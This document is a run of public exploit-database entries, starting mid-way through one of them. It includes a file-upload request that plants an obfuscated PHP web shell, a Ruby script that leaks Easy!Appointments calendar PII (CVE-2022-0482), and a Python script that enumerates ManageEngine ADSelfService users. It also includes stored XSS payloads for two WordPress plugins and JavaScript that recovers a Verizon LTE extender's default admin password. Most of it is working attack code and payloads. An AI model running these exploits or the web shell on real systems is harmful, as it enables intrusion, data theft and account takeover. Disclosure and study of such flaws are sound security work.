sc_actual_lang_samples=en_us Connection: close ------WebKitFormBoundary6gbgDzCQ2aZWm6iZ Content-Disposition: form-data; name="jqul_csrf_token" gZiFUw6nNw84D4euS8RJ3AQLz0o3Bo1Q24Kq1ufcJA8FjRCIeohe0gBZ34hXIW7M ------WebKitFormBoundary6gbgDzCQ2aZWm6iZ Content-Disposition: form-data; name="files[]"; filename="123.php" Content-Type: text/html <?php error_reporting(0); $a = rad2deg^(3).(2); $b = asin^(2).(6); $c = ceil^(1).(1); $exp = $a.$b.$c; //assert $pi=(is_nan^(6).(4)).(tan^(1).(5)); //_GET $pi=$$pi; //$_GET call_user_func($exp,$pi{0}($pi{1})); ?> ------WebKitFormBoundary6gbgDzCQ2aZWm6iZ——— # Notes: - PHPSESSID is - be1281e8cde9348d284c3074c9bea53e - Upload path is - http://x.x.x.:8091/scriptcase/tmp/sc_tmp_upload_{{PHPSESSID}}/123.php

# Exploit Title: Easy Appointments 1.4.2 - Information Disclosure # Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr) # Author website: https://pwn.by/noraj/ # Exploit source: https://github.com/Acceis/exploit-CVE-2022-0482 # Date: 2022-04-11 # Vendor Homepage: https://easyappointments.org/ # Software Link: https://github.com/alextselegidis/easyappointments/archive/refs/tags/1.4.2.tar.gz # Version: < 1.4.3 (it means up to 1.4.2) # Tested on: Easy!Appointments Version 1.3.2 # Vulnerability ## Discoverer: Francesco CARLUCCI ## Date: 2022-01-30 ## Discoverer website: https://carluc.ci/ ## Discovered on OpenNetAdmin 1.4.2 ## Title: Exposure of Private Personal Information to an Unauthorized Actor in alextselegidis/easyappointments ## CVE: CVE-2022-0482 ## CWE: CWE-863 ## Patch: https://github.com/alextselegidis/easyappointments/commit/bb71c9773627dace180d862f2e258a20df84f887#diff-4c48e5652fb13f13d2a50b6fb5d7027321913c4f8775bb6d1e8f79492bdd796c ## References: ## - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/ ## - https://github.com/alextselegidis/easyappointments/tree/1.4.2 ## - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-0482.yaml ## - https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/ ## - https://nvd.nist.gov/vuln/detail/CVE-2022-0482 #!/usr/bin/env ruby require 'date' require 'httpx' require 'docopt' doc = <<~DOCOPT Easy!Appointments < 1.4.3 - Unauthenticated PII (events) disclosure Source: https://github.com/Acceis/exploit-CVE-2022-0482 Usage: #{__FILE__} <url> [<startDate> <endDate>] [--debug] #{__FILE__} -h | --help Options: <url> Root URL (base path) including HTTP scheme, port and root folder <startDate> All events since (default: 2015-01-11) <endDate> All events until (default: today) --debug Display arguments -h, --help Show this screen Examples: #{__FILE__} http://10.0.0.1 #{__FILE__} https://10.0.0.1:4567/subdir 2022-04-01 2022-04-30 DOCOPT def fetch_csrf(root_url, http) vuln_url = "#{root_url}/index.php" http.get(vuln_url) end def exploit(root_url, startDate, endDate, http) vuln_url = "#{root_url}/index.php/backend_api/ajax_get_calendar_events" params = { 'csrfToken' => http.cookies.first.value, # csrfCookie 'startDate' => startDate.nil? ? '2015-01-11' : startDate, 'endDate' => endDate.nil? ? Date.today.to_s : endDate } http.post(vuln_url, form: params) end begin args = Docopt.docopt(doc) pp args if args['--debug'] http = HTTPX.plugin(:cookies) fetch_csrf(args['<url>'], http) puts exploit(args['<url>'], args['<startDate>'], args['<endDate>'], http).body rescue Docopt::Exit => e puts e.message end

# Exploit Title: ManageEngine ADSelfService Plus 6.1 - User Enumeration # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://www.manageengine.com/ # Software Link: https://www.manageengine.com/products/self-service-password/download.html # Version: ADSelfService 6.1 Build 6121 # Tested Against: Build 6118 - 6121 # Details: https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md # !/usr/bin/python3 import requests import sys import time import urllib3 from urllib3.exceptions import InsecureRequestWarning """ The domain users can be enumerated like userenum module of the kerbrute tool using this exploit. If you conducted a brute-force attack against a user, please run the script after 30 minutes (default settings) otherwise the results can be false positive. """ def request(target, user): urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) url = target + 'ServletAPI/accounts/login' data = {"loginName": user} headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"} req = requests.post(url, data=data, headers=headers, verify=False) # For debugging # print("[*] Response for " + user + ": " + req.text.strip()) if 'PASSWORD' in req.text: print("[+] " + user + " is VALID!") elif 'Your account has been disabled' in req.text: print("[+] " + user + " account has been DISABLED.") elif 'Your account has expired' in req.text: print("[+] " + user + " account has EXPIRED.") elif 'Enter the text as shown in the image.' in req.text: print("[!] The exploit doesn't detect expired and disabled users. Please, run it after the 30 minutes. ") elif 'Permission Denied.' in req.text: print("[-] " + user + " is not found.") def get_users(target, file): try: file = open(file, "r") for line in file: line = line.strip() time.sleep(0.5) request(target, user=line) except FileNotFoundError: print("[-] File not found!") sys.exit(1) def main(args): if len(args) != 3: print("[*] Usage: %s url usernames_file" % (args[0])) print("[*] Example: %s https://target/ /tmp/usernames.txt" % (args[0])) sys.exit(1) get_users(target=args[1], file=args[2]) if __name__ == "__main__": main(args=sys.argv)

# Exploit Title: WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS) # Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/ # Date: 2022-04-13 # Exploit Author: UnD3sc0n0c1d0 # Vendor Homepage: http://www.a-j-evolution.com/ # Software Link: https://downloads.wordpress.org/plugin/video-synchro-pdf.1.7.4.zip # Category: Web Application # Version: 1.7.4 # Tested on: CentOS / WordPress 5.9.3 # CVE : N/A # 1. Technical Description: The plugin does not properly sanitize the nom, pdf, mp4, webm and ogg parameters, allowing potentially dangerous characters to be inserted. This includes the reported payload, which triggers a persistent Cross-Site Scripting (XSS). # 2. Proof of Concept (PoC): a. Install and activate version 1.7.4 of the plugin. b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=aje_videosyncropdf_videos). c. Open the "Video example" or create a new one (whichever you prefer). d. Change or add in some of the displayed fields (Name, PDF file, MP4 video, WebM video or OGG video) the following payload: " autofocus onfocus=alert(/XSS/)>. e. Save the changes. "Edit" button. f. JavaScript will be executed and a popup with the text "XSS" will be displayed. Note: This change will be permanent until you modify the edited field.

Exploit Title: Verizon 4G LTE Network Extender - Weak Credentials Algorithm Exploit Author: LiquidWorm Vendor: Verizon Communications Inc. Product web page: https://www.verizon.com Affected version: GA4.38 - V0.4.038.2131 Summary: An LTE Network Extender enhances your indoor and 4G LTE data and voice coverage to provide better service for your 4G LTE mobile devices. It's an extension of our 4G LTE network that's placed directly in your home or office. The LTE Network Extender works with all Verizon-sold 4G LTE mobile devices for 4G LTE data service and HD Voice-capable 4G LTE devices for voice service. This easy-to-install device operates like a miniature cell tower that plugs into your existing high-speed broadband connection to communicate with the Verizon wireless network. Desc: Verizon's 4G LTE Network Extender is utilising a weak default admin password generation algorithm. The password is generated using the last 4 values from device's MAC address which is disclosed on the main webUI login page to an unauthenticated attacker. The values are then concatenated with the string 'LTEFemto' resulting in something like 'LTEFemtoD080' as the default Admin password. Tested on: lighttpd-web Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5701 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5701.php 17.02.2022 -- snippet:///Exploit // // Verizon 4G LTE Network Extender Super Awesome JS Exploit // console.log("Calling 'isDefaultPassword' API"); let req = new Request("/webapi/isDefaultPassword"); let def = req.url; const doAjax = async () => { const resp = await fetch(def); if (resp.ok) { const jsonyo = await resp.json(); return Promise.resolve(jsonyo); } else { return Promise.reject("Smth not rite captain!"); } } doAjax().then(console.log).catch(console.log); await new Promise(t => setTimeout(t, 1337)); console.log("Verizon Admin Password: "); let mac = document.querySelector("#mac_address").innerHTML; console.log("LTEFemto" + mac.substr(-4));

# Exploit Title: WordPress Plugin Popup Maker <1.16.5 - Persistent Cross-Site Scripting (Authenticated) # Date: 2022-03-03 # Exploit Author: Roel van Beurden # Vendor Homepage: https://wppopupmaker.com # Software Link: https://downloads.wordpress.org/plugin/popup-maker.1.16.4.zip # Version: <1.16.5 # Tested on: WordPress 5.9 on Ubuntu 20.04 1. Description: ---------------------- WordPress Plugin Popup Maker <1.16.5 does not sanitise and escape some of its popup settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. 2. Proof of Concept: ---------------------- Create Popup > Popup Settings > Triggers > Add New Cookie > Add > Cookie Time (overwrite the default '1 month' with XSS payload) Click 'Add' what triggers the XSS payload Payload examples: <script>alert('XSS');</script> <img src=x onerror=alert('XSS')>